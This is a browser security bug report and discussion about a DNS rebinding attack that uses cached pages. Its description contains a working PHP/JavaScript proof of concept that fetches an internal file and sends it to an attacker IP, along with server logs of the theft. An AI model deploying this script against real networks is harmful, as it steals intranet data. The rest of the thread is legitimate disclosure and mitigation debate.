Dns rebinding attack using cached resources

Status

RESOLVED WONTFIX

Product: Core
Component: Networking
Reported: 6 years ago
Last modified: a year ago

People

(Reporter: Alok Menghrajani, Unassigned)

Tracking

Keywords: sec-low
Version: 7 Branch
Hardware: x86 Mac OS X
Points: ---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:low] cross-browser issue)

(Reporter)

Description

6 years ago
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.0) Gecko/20100101 Firefox/7.0
Build ID: 20110922153450

Steps to reproduce:

The following security vulnerability affects all browsers, including Firefox.

Please make sure to coordinate with me & other browser vendors before
publicly disclosing the contents of this vulnerability.


VULNERABILITY DETAILS
Browsers implement their own DNS cache to prevent an attack known as DNS
rebinding. I have found a way to circumvent this protection using cached
resources. I believe this bug exists in all browsers, and it can be exploited
to access files on an intranet or on localhost across firewall boundaries.

REPRODUCTION CASE
User A owns the IP address 1.2.3.4. User B has access to an intranet on
10.0.0.x. Let's imagine, for simplicity's sake, that user A knows about a
secret file hosted at http://10.0.0.1/secret.txt.

1. User A sets up a DNS server for a domain he controls (e.g. evil.com),
which uses a round-robin policy to alternate between 1.2.3.4 and 10.0.0.1.
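The round-robin policy from step 1 can be sketched as a small resolver model (this is not a real DNS server, just the alternation logic; the IPs are the ones from the reproduction case, and the TTL of 1 is an assumption to keep resolver caches from pinning an answer):

```javascript
// Sketch of the attacker's round-robin policy: successive queries for
// evil.com alternate between the attacker's public IP and the internal
// target, with a very low TTL so cached answers expire quickly.
function makeRebindingResolver(publicIp, internalIp) {
  let useInternal = false;
  return function resolve(hostname) {
    const address = useInternal ? internalIp : publicIp;
    useInternal = !useInternal;          // flip for the next query
    return { name: hostname, address: address, ttl: 1 };
  };
}

const resolve = makeRebindingResolver("1.2.3.4", "10.0.0.1");
// First answer points at the attacker's server, the next at the intranet host.
```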

2. User A configures a web server on 1.2.3.4, which serves /sticky with
"aggressive" cache headers. This file contains some JavaScript which will
try to fetch the secret file:

<?php
  // cache this page aggressively: mark it fresh for one year so the
  // browser only ever requests it once
  header('Expires: ' . gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
  header('Cache-Control: public, max-age=31536000');
?><html><head></head><body>
<h1>This is a sticky page...</h1>
  <script>
    var xhr = new XMLHttpRequest();
    // steal /secret.txt from whatever host this origin currently resolves to
    xhr.open("GET", "/secret.txt", false);  // synchronous request
    xhr.send();
    // send the data back to the attacker-controlled IP
    var img = new Image();
    img.src = 'http://1.2.3.4/?secret.txt=' + encodeURIComponent(xhr.responseText);
  </script>
</body></html>

3. User A configures his web server to respond to any non-existent file
with the string "n/a". User A needs to make sure that such responses do
not contain any cache directives.
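Step 3's catch-all can be sketched as a tiny Node-style handler (the surrounding server setup is assumed; using an explicit `no-store` is one way to guarantee the miss responses are never cached, which is the intent of "no cache directives" above):

```javascript
// Catch-all for the attacker's server: answer any unknown path with
// "n/a" and forbid caching, so the browser retries /secret.txt on every
// run until a rebind to 10.0.0.1 succeeds.
function catchAll(req, res) {
  res.writeHead(200, { "Cache-Control": "no-store" }); // never cache misses
  res.end("n/a");
}
```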

4. User A gets user B to visit http://evil.com/sticky (an iframe on a
popular site would work).

Since /sticky gets cached, the browser will only ever request it once.

When the AJAX request for /secret.txt fires, the browser performs a
DNS resolution (once per browsing session). The first time this happens,
/secret.txt will be fetched from user A's server and no interesting data will
be returned. However, on a subsequent browser restart,
/secret.txt can resolve to 10.0.0.1, in which case user A will be able
to steal the data from user B's intranet.

(Note: this exploit becomes even more powerful if user A is able to
forcefully hang or crash user B's browser).

I was able to successfully exploit this on Chrome 14.0, Firefox 6.0 and
Safari 5.1 (all three on my Mac OS X).

This is what the logs look like on the server side:

** started browser, hit http://mydomain/sticky **
107.37.9.42 - - [27/Sep/2011:11:28:24 -0700] "GET /sticky HTTP/1.1"
200 235
107.37.9.42 - - [27/Sep/2011:11:28:24 -0700] "GET /secret.txt HTTP/1.1"
200 3
107.37.9.42 - - [27/Sep/2011:11:28:25 -0700] "GET /?secret.txt=n/a
HTTP/1.1" 200 -

** restarted browser, hit http://mydomain/sticky **
107.37.9.42 - - [27/Sep/2011:11:28:39 -0700] "GET /?secret.txt=ChuckNorris
HTTP/1.1" 200 -

A few more notes:

1. The current exploit ends up sending the wrong Host header to the
localhost server. This is something that can be dealt with using raw
sockets. However, the malicious site will not be able to get the browser to
send the cookies scoped to the intranet/localhost. This means any internal
resource which requires authentication remains protected.

2. It's unclear what the best way to solve this issue is. Browsers could
make an extra DNS request when loading data from cache, and
make sure the cross-domain policy remains enforced. However, if a domain
name is hosted on multiple IP addresses, doing so would reduce the cache
hit rate.

3. This bug exists in all browsers. We should coordinate to make sure all
browsers are fixed before disclosing this issue publicly.

Feel free to contact me at alok@fb.com or at 650-353 85 28.



Actual results:

The content of http://10.0.0.1/secret.txt was accessed by an external script.


Expected results:

The cross-domain policy should have prevented this.
Whiteboard: [sg:high]
(Reporter)

Comment 1

6 years ago
Turns out Collin's paper on DNS rebinding already mentioned this attack, back in 2007. Chrome won't fix this issue. I'm unsure what you guys are going to do...

In case you can access it, here is the chrome thread:
http://code.google.com/p/chromium/issues/detail?id=98357
Whiteboard: [sg:high] → [sg:high] cross-browser issue, coordinate disclosure
Status: UNCONFIRMED → NEW
Component: General → Networking
Ever confirmed: true
Product: Firefox → Core
QA Contact: general → networking
Comment 2

6 years ago
Alok, who on the Chrome team are you working with on this issue? I would like to contact them. Also, can you name your points of contact for MS, Apple, and Opera?

Comment 3

6 years ago
Brian, did you get any further on this issue? I cannot read the link from comment #1...

To avoid this, wouldn't we have to enforce that the current DNS record for the host is the same as when we fetched the cached entry (as indicated in comment #0)? It should be possible to implement this by attaching the IP address at load time as metadata on the cache entry and verifying it in nsCrossSiteListenerProxy::CheckRequestApproved() - this might reduce the cache hit rate, but only for cross-site requests, no..?
(Reporter)

Comment 4

6 years ago
As I mentioned previously on this thread, Chrome's response is won't fix.

I will need to look up the status with other browsers. I have not reported this issue to Opera.

Updated

6 years ago
Assignee: nobody → bjarne

Comment 5

6 years ago
I can reproduce this and can talk to Opera about it if nobody has done that yet.

The initial idea from comment #3 seems feasible, although there is (as always) a complication in the details. Current thinking is as follows:

When loading "secret.txt", and after nsXMLHttpRequest::CheckChannelForCrossSiteRequest() has decided that this is a cross-site request, we find the URI of our *principal*, look up its cache entry (if any), and mark it as "containing" a cross-site request (e.g. by attaching the IP address to the cache meta-info). Upon subsequent retrieval, nsHttpChannel::CheckCache() can look for this meta-info and verify that it matches the current IP of the host. This will limit cache misses to principals whose IP address changes and which also contain cross-site requests.
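A rough model of this mitigation, with the resolved IP stored as cache-entry metadata and checked against a fresh lookup on retrieval (class and method names are illustrative, not actual Necko APIs):

```javascript
// IP-pinned cache model: a hit is only served if the host still resolves
// to the same address it had when the entry was stored; otherwise the
// lookup is treated as a miss, forcing a revalidation over the network.
class PinnedCache {
  constructor() { this.entries = new Map(); }
  store(url, resolvedIp, body) {
    this.entries.set(url, { ip: resolvedIp, body: body });
  }
  // currentIp: the result of a fresh DNS lookup for the URL's host
  lookup(url, currentIp) {
    const entry = this.entries.get(url);
    if (!entry) return null;                  // cold miss
    if (entry.ip !== currentIp) return null;  // host moved: force refetch
    return entry.body;
  }
}
```

The trade-off matches the one discussed in the bug: only hosts whose IP actually changes (and, in the refinement above, only those involved in cross-site requests) pay the extra cache misses.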

Comment 6

6 years ago
I'd be curious to know why Chrome decided not to fix this. Let's contact someone on the Chrome security team and see if they can fill us in, or let us access the bug. If they think the bug isn't worth fixing, I wonder why they are continuing to hide it.

Comment 7

6 years ago
Adam, in the paper you co-wrote "Protecting Browsers from DNS Rebinding Attacks" [1], there is this statement: "To prevent this attack, objects in the cache must be retrieved by both URL and originating IP address. This degrades performance when the browser pins to a new IP address, which might occur when the host at the first IP address fails, the user starts a new browsing session, or the user’s network connectivity changes. These events are uncommon and are unlikely to impact performance significantly."

I am surprised by the last sentence quoted. I suspect that, at least in 2011, it is quite common for users' connectivity to change in such a way that performance would be impacted significantly, especially on mobile, but even with laptops. When people are travelling, I suspect it is both more likely that they would be impacted by such a change (because of geo-aware DNS) and more critical that the cache hit rate be as high as possible, as often the network you are on is very poor.

Note that there is no reason to have a same-IP restriction for cached resources retrieved over SSL. Instead, a same-public-key check should be done. A same-public-key check is more secure (AFAICT) AND would be better for the cache hit rate for most sites.
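A hedged sketch of that alternative: pin a hash of the server's public key (e.g. a SPKI digest) on the cache entry instead of its IP, so a site served from many addresses keeps its cache hits, while a rebound attacker, who cannot present the victim's key, still misses. Field names and hash values are placeholders:

```javascript
// Decide whether a cached entry may be served over this connection.
// https entries are validated by public key; plain http falls back to
// the same-IP check discussed elsewhere in this bug.
function cacheHitAllowed(entry, connection) {
  if (entry.scheme === "https") {
    return entry.spkiHash === connection.spkiHash; // same-public-key check
  }
  return entry.ip === connection.ip;               // same-IP check
}
```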

Note that the paper at [1] mentions *several* issues that (AFAICT) may still be unaddressed in Firefox, besides this one.

[1] http://crypto.stanford.edu/dns/

Comment 8

6 years ago
> I am surprised by the last sentence quoted.

We don't have any data to back up that statement.  :)

Comment 9

6 years ago
I'd also recommend that Firefox not fix this issue.  It's not feasible for the browser to protect the user from DNS rebinding attacks.  Servers need to protect themselves by validating the Host header and firewalls need to protect themselves by preventing external names from resolving to internal IP addresses.
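The server-side defense recommended here can be sketched as a minimal allow-list check on the Host header (the allow-list entries are illustrative):

```javascript
// Reject any request whose Host header is not an expected name for this
// server; a rebound origin (evil.com resolving to this machine) fails
// the check because the browser still sends "Host: evil.com".
const allowedHosts = new Set(["intranet.example", "10.0.0.1"]);

function hostIsAllowed(req) {
  const host = (req.headers.host || "").split(":")[0].toLowerCase();
  return allowedHosts.has(host);
}
```

In the exploit from the description, the XHR to 10.0.0.1 carries the evil.com Host header, so this check alone defeats it, which is exactly the point made in note 1 of the report.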

Comment 10

6 years ago
I think we should change the sg rating to sg:low and make this bug public while we decide whether or not we want to fix this. This clearly isn't sg:moderate or higher at this point and discussion will benefit from this being made public.

Updated

6 years ago
Assignee: bjarne → nobody
Group: core-security
Comment 11

6 years ago
http://www.adambarth.com/papers/2009/jackson-barth-bortz-shao-boneh-tweb.pdf

Updated

6 years ago
Whiteboard: [sg:high] cross-browser issue, coordinate disclosure → [sg:low] cross-browser issue
(Reporter)

Comment 12

6 years ago
While I understand that it's something browsers might not always be able to address, it would be nice if browsers tried to:
a) mitigate the risk as much as possible;
b) help web developers understand that the solutions currently in place are only meant to block a subset of rebinding attacks, and that the flaw needs to be addressed at a different level.

Adam: don't you think checking for the same public key for resources retrieved over SSL would be a good thing?

Comment 13

6 years ago
> Adam: don't you think checking for same-public-key for resources retrieved over ssl would be a good thing?

That won't work for deployments that use a server farm with different public keys for each host, as required when using extended validation certificates.

To your larger question, in some cases providing less protection is actually better because it's clear where the responsibility lies. Protecting against these attacks in the browser is infeasible. Protecting against them at the server or at the firewall is pretty easy.
Keywords: sec-low
I'm going to bow to the reality of WONTFIX on this one, matching Chromium.

The security model for the web requires HTTPS to enforce origin semantics.
Status: NEW → RESOLVED
Last Resolved: a year ago
Resolution: --- → WONTFIX